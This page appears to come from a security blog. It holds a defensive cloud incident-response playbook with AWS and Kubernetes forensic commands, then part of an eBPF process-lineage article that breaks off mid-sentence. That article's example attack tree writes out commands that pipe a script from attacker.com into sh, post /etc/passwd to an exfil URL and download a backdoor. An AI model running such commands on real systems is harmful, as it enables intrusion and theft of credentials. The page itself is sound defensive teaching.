Incident Response Archives

Cloud Incident Response Playbook: First 24 Hours After a Breach

July 8, 2026 by Vamshi Krishna Santhapuri

Reading Time: 15 minutes

What is purple team security → OWASP Top 10 mapped to cloud infrastructure → Cloud security breaches 2020–2025 → Broken access control in AWS → MFA fatigue attacks → CI/CD secrets exposure → SSRF to cloud metadata → Kubernetes container escape → Supply chain attack detection → Cloud lateral movement IAM → Detection engineering with eBPF → Cloud Incident Response Playbook

TL;DR

A cloud incident response playbook is not documentation you write after a breach — it is the executable sequence your team runs in the first 24 hours, rehearsed before the breach happens
The ChangeHealthcare attack (February 2024) disrupted $22 billion in medical claims processing and exposed 190 million Americans’ health data; the initial vector was a single set of stolen credentials and a Citrix portal with no MFA
Hours 0–1: declare the incident immediately, scope the blast radius, and start querying CloudTrail — do not investigate quietly
Hours 1–4: contain by revoking credentials and isolating infrastructure, but preserve evidence before any remediation — forensic snapshots and log exports before terminating anything
Hours 4–12: trace lateral movement via AssumeRole chains, identify persistence mechanisms (new IAM users/roles, Lambda backdoors, modified images), and confirm the full data access scope
Hours 12–24: eradicate from known-good baselines, not by patching compromised instances; recover dev → staging → prod; trigger regulatory notification timers

OWASP Mapping: Cross-cutting — incident response is not mapped to a single OWASP category because a breach can enter through any of them. IR quality is the backstop when prevention fails across A01 (broken access control), A07 (authentication failures), A08 (supply chain), and every other vector. The 24-hour window covered here applies regardless of initial entry point.

The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│            CLOUD INCIDENT RESPONSE: THE 24-HOUR SEQUENCE                │
│                                                                         │
│  ALERT                                                                  │
│    GuardDuty / Falco / anomaly detection fires                          │
│    ↓                                                                    │
│  TRIAGE  [0–1h]                                                         │
│    Declare incident → scope blast radius → open incident channel        │
│    Is the attacker still active? What data is at risk?                  │
│    ↓                                                                    │
│  CONTAIN  [1–4h]                                                        │
│    Revoke credentials → isolate compute → cordon K8s nodes             │
│    !! Do NOT terminate instances before snapshot !!                     │
│    ↓                                                                    │
│  PRESERVE  [1–4h, parallel with contain]                                │
│    EBS snapshots → CloudTrail log export → VPC Flow export              │
│    Forensic copy before any remediation changes the system state        │
│    ↓                                                                    │
│  INVESTIGATE  [4–12h]                                                   │
│    AssumeRole chain analysis → data access scope → persistence hunt     │
│    eBPF/Falco/Tetragon evidence if available (see EP11)                 │
│    ↓                                                                    │
│  ERADICATE  [12–24h]                                                    │
│    Remove persistence → rotate ALL credentials in blast radius          │
│    Replace compromised instances from known-good hardened AMI           │
│    ↓                                                                    │
│  RECOVER  [12–24h]                                                      │
│    dev → staging → prod sequence. Never prod-first.                     │
│    Verify monitoring before declaring all-clear                         │
│    ↓                                                                    │
│  LEARN                                                                  │
│    Post-incident review → timeline → regulatory notifications           │
│    Update playbook before the next incident                             │
└─────────────────────────────────────────────────────────────────────────┘

A cloud incident response playbook that exists only as a document is not an incident response capability. The sequence above is only useful if your team has rehearsed it — run it as a tabletop, run it in a chaos exercise, run it on a simulated breach in a non-prod account. The first time through this sequence should not be during an actual breach.

The Incident: ChangeHealthcare (February 2024)

On February 21, 2024, ransomware attacked Change Healthcare, a UnitedHealth Group subsidiary that processes roughly 50% of US medical claims. By the time containment completed, the damage was:

$22 billion in medical claims processing disrupted
190 million Americans’ health data potentially exposed
Hospitals unable to process insurance claims for weeks — some faced payroll crises because they couldn’t get reimbursed for care already delivered
A $22 million ransom paid to ALPHV/BlackCat, followed by ALPHV exit-scamming the affiliate (keeping the ransom), followed by RansomHub re-extorting with the same data

The initial vector: a Citrix remote access portal with no MFA enforced. A single set of stolen credentials. That’s it.

What made the outcome as severe as it was: the attackers had nine days of dwell time before the ransomware detonated. Nine days of lateral movement, data staging, and backup discovery before the explosion. The first 24 hours after detection determine whether you contain an intrusion or respond to a full-scale breach. The ChangeHealthcare team was responding to a full-scale breach because the first 24 hours happened nine days before anyone knew there was an incident.

There is an inverse relationship between incident response quality and preparation investment. Teams that contain in four hours practiced containing in four hours. Teams that discover they have no forensic evidence discover that during the investigation, not before it.

Hour 0–1: Detect and Declare

Step 1: Declare — Do Not Investigate Quietly

The instinct when something looks suspicious is to investigate before escalating. That instinct is wrong in cloud incidents. Every minute of quiet investigation is a minute the attacker may be escalating privileges, staging data, or discovering your backups.

Declare the incident immediately. The threshold for declaration is suspicion, not confirmation.

Who to notify in the first 15 minutes:
– CISO (or on-call security lead)
– Legal counsel (regulatory clock starts now; you need legal involved from minute one)
– On-call SRE lead (you will need infrastructure access)
– Communications lead (if external-facing systems are involved)

Operational setup:
1. Create a dedicated incident Slack channel: #incident-YYYY-MM-DD-brief-descriptor
2. Start an incident log — a shared doc, timestamped, with every action taken and by whom. This becomes your evidence log and your regulatory submission document.
3. Assign a scribe. The incident commander should not also be taking notes.

Step 2: Scope the Blast Radius

Before touching anything, answer three questions:

Is the attacker still active? (Is this ongoing or historical?)
What is the potential blast radius? (Which accounts, regions, services, principals are in scope?)
What data is at risk? (PII, credentials, intellectual property, PHI/PII with regulatory implications?)

Step 3: Initial CloudTrail Query

# Run this before touching anything — you want a clean baseline
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=Username,AttributeValue=suspected-role \
  --start-time $(date -d '1 hour ago' --iso-8601=seconds) \
  --query 'Events[*].[EventTime,EventName,Resources[0].ResourceName]' \
  --output table

# If you don't know the principal yet — look for unusual API activity
# across all principals in the last hour
aws cloudtrail lookup-events \
  --start-time $(date -d '1 hour ago' --iso-8601=seconds) \
  --query 'Events[*].{Time:EventTime,User:Username,Event:EventName,Source:EventSource}' \
  --output json | \
  jq 'sort_by(.Time) | reverse | .[:50]'
# Look for: CreateUser, AttachRolePolicy, PutRolePolicy, CreateAccessKey,
#           GetSecretValue, ListBuckets, DescribeInstances in rapid succession

# Check GuardDuty for the triggering finding
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty get-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-ids $(aws guardduty list-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-criteria '{
      "Criterion": {
        "updatedAt": {"Gte": '$(date -d '24 hours ago' +%s000)'}
      }
    }' \
    --sort-criteria '{"AttributeName":"updatedAt","OrderBy":"DESC"}' \
    --max-results 10 \
    --query 'FindingIds' --output text) | \
  jq '.Findings[] | {type: .Type, severity: .Severity, time: .UpdatedAt, detail: .Description}'

Hour 1–4: Contain Without Destroying Evidence

The central tension in early containment: you need to stop the bleeding, but you also need the evidence. Terminating a compromised EC2 instance stops the threat on that instance — it also destroys the process table, network connections, in-memory artifacts, and filesystem state that the investigation needs.

The order of operations:
1. Preserve (snapshot, export logs)
2. Contain (revoke credentials, isolate network)
3. Never terminate before step 1

Evidence Preservation (Before Any Containment Action)

# Create EBS snapshots of ALL volumes on compromised instances
# Do this FIRST — before network isolation, before anything
aws ec2 describe-instances \
  --instance-ids i-compromised-instance-id \
  --query 'Reservations[].Instances[].BlockDeviceMappings[].Ebs.VolumeId' \
  --output text | tr '\t' '\n' | \
  while read vol_id; do
    echo "Snapshotting volume: ${vol_id}"
    aws ec2 create-snapshot \
      --volume-id "${vol_id}" \
      --description "IR evidence - $(date --iso-8601) - ${vol_id}" \
      --tag-specifications "ResourceType=snapshot,Tags=[{Key=incident,Value=active},{Key=preserve,Value=legal-hold}]"
  done

# Export CloudTrail logs for the incident window to a local IR evidence directory
# Use a time window that starts 24 hours before the suspected compromise
aws s3 sync \
  s3://your-cloudtrail-bucket/AWSLogs/123456789012/CloudTrail/ \
  ./ir-evidence/cloudtrail/ \
  --exclude "*" \
  --include "*/2024/02/21/*" \
  --include "*/2024/02/22/*"

# Export VPC Flow Logs for the incident window
# These show network connections that CloudTrail doesn't capture
aws logs filter-log-events \
  --log-group-name /aws/vpc/flowlogs \
  --start-time $(date -d '24 hours ago' +%s000) \
  --end-time $(date +%s000) \
  --query 'events[*].message' \
  --output text > ./ir-evidence/vpc-flow-logs.txt

Containment Action 1: Revoke the Compromised Credential

# Option A: Disable an IAM user's access key (reversible — preserves key for forensics)
aws iam update-access-key \
  --user-name compromised-user \
  --access-key-id AKIAIOSFODNN7EXAMPLE \
  --status Inactive

# Option B: If the compromised principal is an IAM role —
# attach a deny-all inline policy (fastest, takes effect immediately)
aws iam put-role-policy \
  --role-name compromised-role \
  --policy-name incident-deny-all \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [
      {
        "Sid": "IncidentDenyAll",
        "Effect": "Deny",
        "Action": "*",
        "Resource": "*"
      }
    ]
  }'

# Option C: If you need to revoke ALL active sessions for a role immediately
# (active STS sessions are not invalidated by the deny policy alone
#  until the session token expires — use this to force immediate revocation)
aws iam put-role-policy \
  --role-name compromised-role \
  --policy-name incident-deny-all \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [
      {
        "Effect": "Deny",
        "Action": "*",
        "Resource": "*",
        "Condition": {
          "DateLessThan": {
            "aws:TokenIssueTime": "'$(date --iso-8601=seconds)'"
          }
        }
      }
    ]
  }'
# This denies all requests where the token was issued before right now
# — effectively invalidating all existing sessions for this role

Containment Action 2: Isolate Affected EC2 Instances

# Create an isolation security group — no ingress, no egress
# except SSH from your IR bastion (for forensic access if needed)
ISOLATION_SG=$(aws ec2 create-security-group \
  --group-name "incident-isolation-$(date +%Y%m%d)" \
  --description "Incident isolation - no network access except IR bastion" \
  --vpc-id vpc-your-vpc-id \
  --query 'GroupId' \
  --output text)

echo "Isolation SG created: ${ISOLATION_SG}"

# Add ingress rule: only from IR bastion (for forensic access)
# Remove this rule entirely if you don't need it
aws ec2 authorize-security-group-ingress \
  --group-id "${ISOLATION_SG}" \
  --protocol tcp \
  --port 22 \
  --cidr YOUR-IR-BASTION-IP/32

# Apply the isolation SG to the compromised instance
# This replaces all existing security groups — the instance is now isolated
aws ec2 modify-instance-attribute \
  --instance-id i-compromised-instance-id \
  --groups "${ISOLATION_SG}"

Important: Do not terminate the instance. The isolated instance remains available for forensic analysis via the IR bastion. Termination destroys volatile evidence. You terminate after the investigation is complete and legal has cleared the evidence for destruction.

Containment Action 3: Kubernetes — Cordon, Don’t Delete

# Cordon the compromised node — prevents new pod scheduling
kubectl cordon node/compromised-node-name

# Label the node for IR tracking
kubectl label node/compromised-node-name incident=active preserve=legal-hold

# If a specific pod is the concern — do NOT kubectl delete pod
# Instead, collect forensic information first
POD_NAME="compromised-pod"
NAMESPACE="production"

# Capture the full pod spec and status
kubectl get pod "${POD_NAME}" -n "${NAMESPACE}" -o json > \
  ./ir-evidence/pod-spec-${POD_NAME}.json

# Capture environment variables (may contain credential evidence)
kubectl exec "${POD_NAME}" -n "${NAMESPACE}" -- env > \
  ./ir-evidence/pod-env-${POD_NAME}.txt 2>/dev/null

# Capture running processes
kubectl exec "${POD_NAME}" -n "${NAMESPACE}" -- ps auxf > \
  ./ir-evidence/pod-processes-${POD_NAME}.txt 2>/dev/null

# Capture network connections
kubectl exec "${POD_NAME}" -n "${NAMESPACE}" -- ss -tunapw > \
  ./ir-evidence/pod-netstat-${POD_NAME}.txt 2>/dev/null

# Now you can delete the pod if needed — you have the evidence

Hour 4–12: Investigate the Blast Radius

Containment stops the active threat. Investigation answers: what did they do, where did they go, and what did they touch?

Trace the Lateral Movement

The most important lateral movement mechanism in AWS is AssumeRole chaining — a compromised principal assumes a role, which has permissions to assume another role, building a privilege escalation path. IAM attack path reconstruction requires following this chain through CloudTrail.

# Find all AssumeRole events from the compromised principal
# This shows every role the attacker assumed after initial compromise
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole \
  --start-time "2024-02-21T00:00:00Z" \
  --end-time "2024-02-22T23:59:59Z" \
  --output json | \
  jq '.Events[] | 
    (.CloudTrailEvent | fromjson) | 
    select(.userIdentity.arn | contains("compromised-role")) | 
    {
      time: .eventTime,
      caller: .userIdentity.arn,
      assumed_role: .requestParameters.roleArn,
      session_name: .requestParameters.roleSessionName,
      source_ip: .sourceIPAddress
    }'

# Follow the chain — get ALL roles assumed during the incident window
# regardless of source, then trace connections manually
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole \
  --start-time "2024-02-21T00:00:00Z" \
  --end-time "2024-02-22T23:59:59Z" \
  --output json | \
  jq -r '.Events[] | 
    (.CloudTrailEvent | fromjson) | 
    [.eventTime, .userIdentity.arn, .requestParameters.roleArn, .sourceIPAddress] | 
    @tsv' | \
  sort -k1
# Build the graph manually: which ARN called AssumeRole for which target role
# Any role not in your expected deployment automation is suspicious

Find What Data Was Accessed

# S3 GetObject events — shows every object the attacker read
# NOTE: S3 data events are NOT enabled by default in CloudTrail
# If you haven't pre-enabled them, this query returns nothing useful
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=GetObject \
  --start-time "2024-02-21T00:00:00Z" \
  --end-time "2024-02-22T23:59:59Z" \
  --output json | \
  jq '.Events[] | 
    (.CloudTrailEvent | fromjson) | 
    {
      time: .eventTime,
      user: .userIdentity.arn,
      bucket: .requestParameters.bucketName,
      key: .requestParameters.key,
      source_ip: .sourceIPAddress
    }'

# Secrets Manager — what secrets were accessed?
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=GetSecretValue \
  --start-time "2024-02-21T00:00:00Z" \
  --output json | \
  jq '.Events[] | 
    (.CloudTrailEvent | fromjson) | 
    {
      time: .eventTime,
      user: .userIdentity.arn,
      secret: .requestParameters.secretId,
      source_ip: .sourceIPAddress
    }'

# KMS — what was decrypted?
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=Decrypt \
  --start-time "2024-02-21T00:00:00Z" \
  --output json | \
  jq '.Events[] | 
    (.CloudTrailEvent | fromjson) | 
    {
      time: .eventTime,
      user: .userIdentity.arn,
      key_id: .requestParameters.keyId,
      source_ip: .sourceIPAddress
    }'

Hunt for Persistence Mechanisms

Attackers establish persistence before detonating ransomware or before exfiltrating at scale. The most common persistence mechanisms in AWS:

# New IAM users created during the incident window
aws iam list-users \
  --query 'Users[?CreateDate>=`2024-02-21T00:00:00Z`].[UserName,CreateDate,UserId]' \
  --output table

# New IAM roles created during the incident window
aws iam list-roles \
  --query 'Roles[?CreateDate>=`2024-02-21T00:00:00Z`].[RoleName,CreateDate,RoleId]' \
  --output table

# New IAM access keys created for existing users
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=CreateAccessKey \
  --start-time "2024-02-21T00:00:00Z" \
  --output json | \
  jq '.Events[] | (.CloudTrailEvent | fromjson) | {time: .eventTime, user: .requestParameters.userName, by: .userIdentity.arn}'

# Lambda functions with recent code modifications
# (Lambda is a common backdoor target — function code is easy to modify)
aws lambda list-functions \
  --query 'Functions[?LastModified>=`2024-02-21`].[FunctionName,LastModified,Runtime]' \
  --output table

# For any recently modified function — check for unexpected environment variables
aws lambda get-function-configuration \
  --function-name suspicious-function-name \
  --query '{env: Environment.Variables, role: Role, handler: Handler}'

# CloudFormation stacks created or modified during incident window
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=CreateStack \
  --start-time "2024-02-21T00:00:00Z" \
  --output json | \
  jq '.Events[] | (.CloudTrailEvent | fromjson) | {time: .eventTime, stack: .requestParameters.stackName, by: .userIdentity.arn}'

# EC2 user-data modifications (backdoor via user data on restart)
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=ModifyInstanceAttribute \
  --start-time "2024-02-21T00:00:00Z" \
  --output json | \
  jq '.Events[] | (.CloudTrailEvent | fromjson) | select(.requestParameters | has("userData")) | {time: .eventTime, instance: .requestParameters.instanceId, by: .userIdentity.arn}'

eBPF and Falco Evidence (If Available)

If your environment runs Falco or Cilium Tetragon (see detection engineering with eBPF), the kernel-level telemetry from EP11 is now forensic evidence:

# Tetragon: export process execution events for the incident window
# Tetragon writes to /var/log/tetragon/tetragon.log by default
# Filter by the time window and affected pod/node

# On the affected node (or via log aggregation if you ship to a SIEM):
cat /var/log/tetragon/tetragon.log | \
  jq 'select(.time >= "2024-02-21T00:00:00Z" and .time <= "2024-02-22T23:59:59Z") |
    select(.process_exec != null) |
    {
      time: .time,
      pod: .process_exec.process.pod.name,
      ns: .process_exec.process.pod.namespace,
      binary: .process_exec.process.binary,
      args: .process_exec.process.arguments,
      parent: .process_exec.parent.binary
    }' | head -100

# Falco: pull alerts from the incident window out of your SIEM/log store
# If you're running Falco with file output:
grep "2024-02-21\|2024-02-22" /var/log/falco/events.json | \
  jq 'select(.priority == "Critical" or .priority == "Error") |
    {time: .time, rule: .rule, output: .output, pod: .output_fields."k8s.pod.name"}' | \
  head -50

Process lineage from Tetragon (which parent process spawned which child) is often the clearest signal of container escape or lateral movement within a cluster. It shows attack paths that API-layer logging cannot reconstruct.

Hour 12–24: Eradicate and Recover

Remove Persistence

Work through the persistence findings from the investigation phase in order:

# Delete unauthorized IAM users created during the incident
# First: disable their access keys
aws iam list-access-keys --user-name attacker-created-user \
  --query 'AccessKeyMetadata[].AccessKeyId' --output text | \
  tr '\t' '\n' | \
  while read key_id; do
    aws iam update-access-key --user-name attacker-created-user \
      --access-key-id "${key_id}" --status Inactive
  done

# Then: detach all policies, remove from groups, delete login profile, delete user
aws iam detach-user-policy --user-name attacker-created-user \
  --policy-arn arn:aws:iam::123456789012:policy/attached-policy
aws iam delete-user --user-name attacker-created-user

# Rotate ALL credentials that could have been accessed during the incident window
# Not just the initial compromise — every secret in the blast radius

# List all IAM user access keys in the affected account
aws iam list-users --query 'Users[].UserName' --output text | tr '\t' '\n' | \
  while read user; do
    aws iam list-access-keys --user-name "${user}" \
      --query 'AccessKeyMetadata[?Status==`Active`].{User:UserName,Key:AccessKeyId}' \
      --output json
  done | jq -s 'flatten'
# For each key: create new key → update application config → delete old key

# Remove Lambda backdoors — restore from last known-good deployment
# Do NOT patch the modified function — replace the entire deployment package
aws lambda update-function-code \
  --function-name backdoored-function \
  --s3-bucket your-code-bucket \
  --s3-key known-good/function-v1.2.3.zip

# Reset environment variables (remove anything added during incident)
aws lambda update-function-configuration \
  --function-name backdoored-function \
  --environment 'Variables={EXPECTED_VAR=expected_value}'

Replace Compromised Instances From Known-Good Baselines

Do not patch a compromised instance and return it to production. The instance’s integrity is unknown — the attacker may have modified binaries, installed kernel modules, or altered the init system in ways that a filesystem scan won’t catch.

Replace from a known-good hardened image:

# Launch a replacement from a hardened baseline AMI
# If you're running a Stratum-built image pipeline, this is where it pays off:
# you have a signed, hardened, versioned AMI to replace from

aws ec2 run-instances \
  --image-id ami-known-good-hardened-baseline \
  --instance-type t3.medium \
  --subnet-id subnet-your-private-subnet \
  --security-groups sg-your-normal-sg \
  --iam-instance-profile Name=your-instance-profile \
  --tag-specifications \
    'ResourceType=instance,Tags=[{Key=Name,Value=replacement-post-incident},{Key=incident-id,Value=2024-02-21}]' \
  --user-data file://init-script.sh

If you don’t have a hardened AMI pipeline, this incident is the forcing function to build one. Rebuilding from a generic AMI means re-running your full configuration management stack and hoping nothing drifts. Rebuilding from a known-good hardened baseline means launching and verifying.

Recovery Sequence

dev → staging → prod

Not prod first. Not all at once.

Bring dev back up. Verify monitoring and alerting are functional — specifically, verify that the detection that fired during this incident still fires in dev. If you can’t reproduce the detection in dev, you don’t know if it’s working.

Promote to staging. Run your standard smoke tests plus whatever you added to your detection suite based on this incident.

Promote to prod only after staging has been clean for at least four hours.

The Post-Incident Review

Schedule it within 72 hours of resolution. Not a blame session — a timeline reconstruction and process improvement meeting. What to document:

Timeline reconstruction (to the minute):

Time	Event	Who	Evidence Source
Feb 21 12:47	Initial compromise — credential used from unexpected IP	Attacker	CloudTrail
Feb 21 12:51	First AssumeRole to production role	Attacker	CloudTrail
Feb 21 13:15	S3 ListBuckets on customer-data bucket	Attacker	CloudTrail data events
Feb 21 21:30	GuardDuty fires: UnauthorizedAccess:IAMUser/AnomalousBehavior	GuardDuty	GuardDuty finding
Feb 21 21:35	On-call engineer acknowledges alert	SRE	PagerDuty
Feb 21 21:50	Incident declared, channel created	IR lead	Slack

Key metrics to measure and improve:

Mean Time to Detect (MTTD): Time between initial compromise and first alert
Mean Time to Declare (MTTDeclare): Time between first alert and formal incident declaration
Mean Time to Contain (MTTC): Time between declaration and credential revocation + network isolation
Blast radius: Accounts, services, data classifications confirmed in scope

Regulatory notification requirements (know these before the incident):

GDPR: 72 hours from discovery to supervisory authority notification
HIPAA: 60 days from discovery to individual notification; 60 days to HHS for breaches affecting 500+ individuals
CCPA: “expedient” notification to individuals; no fixed statutory window for regulator notification but AG guidance suggests 72 hours
SEC (public companies): 4 business days from determining the incident is “material”
Check your state breach notification laws — 50 states, 50 different windows

⚠ Production Gotchas

Revoking a credential mid-operation breaks running jobs. If the compromised IAM role is used by production services, the deny-all policy will immediately break those services. Have a plan for emergency credential rotation before you act — either a separate role for legitimate services or a maintenance window. The contain-vs-service-availability tradeoff is a real one; make it deliberately, document it in the incident log.

CloudTrail data events are not enabled by default. Management events (API calls like CreateUser, RunInstances, AssumeRole) are enabled. Data events (S3 GetObject, Lambda function invocations, DynamoDB item-level activity) must be explicitly enabled and cost extra. If you discover during an incident that you needed S3 data events and didn’t have them, you cannot reconstruct what data the attacker accessed. Enable them before the incident.

Forensic snapshots cost money. EBS snapshot storage is not free, and snapshotting every volume on every compromised instance adds up. Have a pre-approved IR budget that includes forensic snapshot costs — getting financial approval in the middle of an active incident is a delay you don’t want.

Legal hold means don’t delete anything. Once legal is involved, no evidence can be destroyed without legal clearance. That includes the compromised EC2 instances, the forensic snapshots, the log exports, and the incident Slack channel. Set legal-hold tags on all IR artifacts immediately and don’t clean up until legal explicitly says to.

The attacker may still be in. Containment removes one credential and one network path. If the attacker established multiple persistence mechanisms before you detected them, containment is the beginning of the eradication phase, not the end. Assume they’re still in until the persistence hunt is complete.

Multi-account blast radius compounds quickly. AssumeRole chains can cross account boundaries. A compromised role in account A that can assume a role in account B means the blast radius spans both accounts, and CloudTrail logging in account A does not show what the attacker did after assuming the role in account B. Pull CloudTrail from every account in the blast radius.

Quick Reference: IR Checklist — First 24 Hours

Hour 0–1: Declare and Scope

[ ] Declare incident — do not investigate quietly
[ ] Notify: CISO, Legal, on-call SRE lead
[ ] Create incident Slack channel: #incident-YYYY-MM-DD-descriptor
[ ] Start timestamped incident log (shared doc, assign scribe)
[ ] Query CloudTrail: last 1–2 hours of suspected principal activity
[ ] Check GuardDuty for active findings
[ ] Answer: active or historical? blast radius? data at risk?

Hour 1–4: Preserve, Then Contain

[ ] FIRST: Snapshot all volumes on compromised EC2 instances
[ ] FIRST: Export CloudTrail logs for incident window to IR evidence directory
[ ] FIRST: Export VPC Flow Logs for incident window
[ ] Revoke compromised IAM credential (disable key or attach deny-all policy)
[ ] For role sessions: use DateLessThan condition to invalidate active sessions
[ ] Apply isolation security group to compromised EC2 instances (do NOT terminate)
[ ] Cordon compromised Kubernetes nodes (do NOT delete pods before forensic capture)
[ ] Collect pod forensics: spec, env vars, process list, network connections

Hour 4–12: Investigate

[ ] Trace AssumeRole chain from compromised principal — build the lateral movement graph
[ ] Query S3 GetObject, GetSecretValue, Decrypt events for data access scope
[ ] Hunt persistence: new IAM users/roles, new access keys, Lambda modifications
[ ] Check EC2 user-data modifications, new CloudFormation stacks
[ ] Pull Tetragon/Falco evidence if available — process lineage and connection logs
[ ] Cross-account check: pull CloudTrail from every account reached via AssumeRole

Hour 12–24: Eradicate and Recover

[ ] Delete all unauthorized IAM users/roles/access keys created during incident
[ ] Rotate ALL credentials in the blast radius (not just the initial compromise)
[ ] Remove Lambda backdoors — replace entire deployment package, reset environment
[ ] Replace compromised instances from known-good hardened AMI (do not patch-in-place)
[ ] Recover: dev → staging → prod. Verify detection fires in dev before promoting.
[ ] Declare all-clear only after monitoring shows clean in prod for 4+ hours

Ongoing: Regulatory and Communication

[ ] Log discovery time — regulatory clocks (GDPR 72h, HIPAA 60d) start at discovery
[ ] Legal hold on all IR artifacts — do not delete without legal clearance
[ ] Schedule post-incident review within 72 hours of resolution
[ ] Update this playbook before the next incident

Key Takeaways

A cloud incident response playbook only works if it has been rehearsed before the incident — the ChangeHealthcare attack showed that nine days of undetected dwell time transforms a credential theft into a national healthcare disruption
Preserve before you contain: snapshot volumes and export logs before revoking credentials or isolating instances — forensic evidence destroyed during hasty containment cannot be reconstructed
The contain-vs-evidence tension is real and deliberate: isolated EC2 instances remain available for forensic access via IR bastion; terminated instances do not
CloudTrail data events (S3 GetObject, Lambda invocations) are not enabled by default — if you need them during an incident and haven’t pre-enabled them, your data access scope is unknown
Recovery sequence is dev → staging → prod, and you verify detection fires in dev before promoting — if you can’t reproduce the detection that caught the original incident, you don’t know if it still works

What’s Next

This playbook is reactive. You run it after something goes wrong. EP13 is about making it proactive — running structured attack simulations against your own infrastructure on a regular cadence so the first time your team works through this sequence is not during an actual breach. Continuous purple team testing means your IR team has muscle memory for the playbook, your detection tooling is validated against real attack patterns, and your blast radius assumptions are tested before an attacker tests them for you.

Get EP13 in your inbox when it publishes → subscribe at linuxcent.com

Process Lineage — Reconstructing What Happened After the Fact

July 6, 2026June 18, 2026 by Vamshi Krishna Santhapuri

Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 13
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace · Network Flow Observability · DNS Observability · LSM and Tetragon · Process Lineage

TL;DR

Process lineage with eBPF hooks fork and exec at the kernel level — building a tamper-resistant record of every process spawned, tied to its parent, pod, namespace, and timestamp
(kprobe on fork/exec = an eBPF program that fires every time the kernel’s fork() or execve() system call runs, capturing process name, PID, parent PID, and arguments before any userspace observer could be bypassed)
Application logs and container stdout can be deleted or suppressed by a compromised process; kernel-level process events written to a ringbuf and exported to a persistent store cannot
The kernel’s task_struct contains the complete process identity: PID, PPID, UID, GID, process name, capabilities, and cgroup (which maps directly to a pod)
Tetragon and Falco both build process lineage from kernel events; the difference is storage — Tetragon persists a kernel-side cache of the process tree in BPF maps, Falco reconstructs lineage from an audit log stream
Reconstructing an incident from process lineage requires: who spawned the attacker’s process, what did it execute, what files did it open, what connections did it make — all correlated by PID and timestamp
Production caution: process events on a busy node can generate high ringbuf write volume; filter aggressively by namespace/cgroup at the eBPF level, not in userspace

EP12 showed how LSM hooks enforce at the syscall boundary — preventing operations before they complete. Process lineage with eBPF is the complementary capability: when an attacker bypasses enforcement, or when you need to understand what happened before the policy was in place, the kernel-level process record is how you reconstruct the attack chain. This episode covers how that record is built and how to read it.

Quick Check: What Process Events Is Your Cluster Already Recording?

# On any cluster node — verify exec tracing is available
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%-20s %-6d %s\n", comm, pid, str(args->filename));
}' --timeout 10

# Expected output:
# containerd-shim     1203   /usr/bin/runc
# runc                1204   /usr/sbin/runc
# sh                  1205   /bin/sh
# node                1842   /usr/local/bin/node
# kube-proxy          2091   /usr/local/bin/kube-proxy

# If Tetragon is installed — view the live process lineage stream
kubectl exec -n kube-system \
  $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_EXEC | head -20

Sample Tetragon output:

{
  "process_exec": {
    "process": {
      "pid": 18293,
      "binary": "/bin/sh",
      "arguments": "-c health-check.sh",
      "start_time": "2026-04-22T09:14:03.412Z",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"},
      "parent_pid": 18201
    },
    "parent": {
      "pid": 18201,
      "binary": "/usr/local/bin/my-app",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"}
    }
  }
}

Each event has the process, its parent, the pod, the namespace, and the full binary path. That’s the raw material for process lineage reconstruction.

Not running Tetragon? Plain bpftrace on the node gives you the same raw data without Kubernetes enrichment — you get PIDs and process names but not pod names or namespaces without the /proc/<pid>/cgroup mapping step. For incident reconstruction, the Tetragon-enriched stream is significantly more useful because pod attribution is baked in at capture time, not reconstructed afterward.

A container in the payments namespace was reported compromised. The security team’s automated response had already restarted the pod — the attacker’s process was gone. The container’s filesystem had been reset to the image. The application logs for that pod were deleted when the pod restarted. The Kubernetes event log showed the pod restart but nothing about what had run inside it.

Three questions, no answers yet:
1. What spawned the attacker’s process? (was it a remote code execution in the app, or a misconfigured exec?)
2. What did the attacker run after getting in? (what did they download, execute, touch?)
3. What network connections did they make? (where did data go, if anywhere?)

The answers were in Tetragon’s process event export — captured at the kernel level before the pod was restarted, stored in the observability backend, and queryable by pod name and time window. The kernel had seen every exec, every fork, every file open. The restart didn’t touch that record.

The lineage showed:

my-app (PID 18201)
  └── sh -c "curl http://attacker.com/payload.sh | sh"  (PID 18293)
        └── sh payload.sh  (PID 18294)
              ├── cat /etc/passwd  (PID 18295)
              ├── curl http://attacker.com/exfil -d @/etc/passwd  (PID 18296)
              └── wget -O /tmp/.x http://attacker.com/backdoor  (PID 18297)
                    └── chmod +x /tmp/.x  (PID 18298)

Five minutes of attacker activity, fully reconstructed, from a pod that no longer existed.

How the Kernel Tracks Process Identity

Every process in Linux is represented by a task_struct — the kernel’s internal data structure for a running process. It contains everything the kernel knows about that process.

task_struct — the kernel’s primary data structure for a process. Contains: PID, PPID, UID, GID, process name (comm, 15 chars), open file descriptors, memory mappings, namespace references, cgroup membership, capabilities, and a pointer to the parent task_struct. When bpftrace uses curtask, it’s returning a pointer to the current process’s task_struct. Reading curtask->real_parent->tgid gives you the parent’s PID — the foundation of process lineage.

When a process calls fork(), the kernel:
1. Allocates a new task_struct for the child
2. Copies the parent’s task_struct fields into the child
3. Sets the child’s real_parent pointer to the parent’s task_struct
4. Assigns the child a new PID
5. Returns the child’s PID to the parent, and 0 to the child

When the child calls execve(), the kernel:
